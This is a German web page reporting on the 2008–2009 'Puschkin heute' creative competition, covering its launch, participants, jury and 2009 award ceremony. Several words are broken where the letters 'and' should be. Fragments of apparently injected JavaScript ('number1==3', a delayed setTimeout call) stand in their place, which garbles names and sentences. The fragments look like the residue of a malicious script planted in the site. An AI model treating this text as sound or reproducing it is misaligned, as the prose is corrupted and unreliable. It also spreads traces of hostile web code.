Aus Anlass des 210. Geburtstages des großen russischen Schriftstellers Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander Puschkins hatten der Verein „Deutsch Russische Festtage e.V.“ und die Russkiy Mir Foundation mit Unterstützung des Vereins „Deutsch-Russisches Forum e.V.“ einen Kreativwettbewerb ausgeschrieben. Interessenten waren herzlich eingeladen, mitzumachen.

1. Der Beginn
2. Die Statistik
3. Die Jury
4. Die Gewinner

 

1. Der Beginn
Es begann am 20. November 2008 bei der Eröffnung der Fotoausstellung “Begegnung zweier Nationen – Deutsch Russische Festtage” im Russischen Haus der Wissenschaften und Kultur, als der offizielle Startschuss für den Kreativwettbewerb “Puschkin heute / Puschkin in meinem Leben” fiel. Zu diesem Zeitpunkt wusste niemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, ob es gelingen würde,  die Menschen für einen solchen Wettbewerb zu begeistern. Der selbstgestellte Anspruch war hoch: ein bundesweiter Wettbewerb in deutscher und/oder russischer Sprache. Wie sich herausstellt, waren diese Ängste und Befürchtungen unbegründet …

2. Die Statistik
Der Wettbewerb fandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and eine sehr gute Resonanz. Die Teilnehmer kamen aus 12 Bundesländern. Die jüngste ist 14, die älteste Teilnehmerin ist 83 Jahre alt.
Weitere Informationen entnehmen Sie bitte dem PDF – 40kB.

3. Die Jury
Eine unabhängige, internationale Jury wurde gebildet, der unter andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderem der Direktor des staatlichen Puschkinmuseums E. Bogatyrev und der stellvertretende Direktor der Stiftung Russkij Mir, S. Morgunov (beide aus Moskau, Russische Föderation) angehörten.
Die Namen der Jury-Mitglieder entnehmen Sie bitte dem PDF – 48kB.

4. Die Gewinner
Am 12. Juni 2009 wurden die Gewinner bei einer feierlichen Zeremonie während der Deutsch-Russischen Festtage in Berlin Karlshorst bekannt gegeben.

Quelle für den Artikel https://www.drf-berlin.de

Bei der Preisverleihung (Quelle DRF)

Hier ziert Unser Beitrag die Titelseite einer Deutsch – russischen Jugendzeitung


Kreativwettbewerb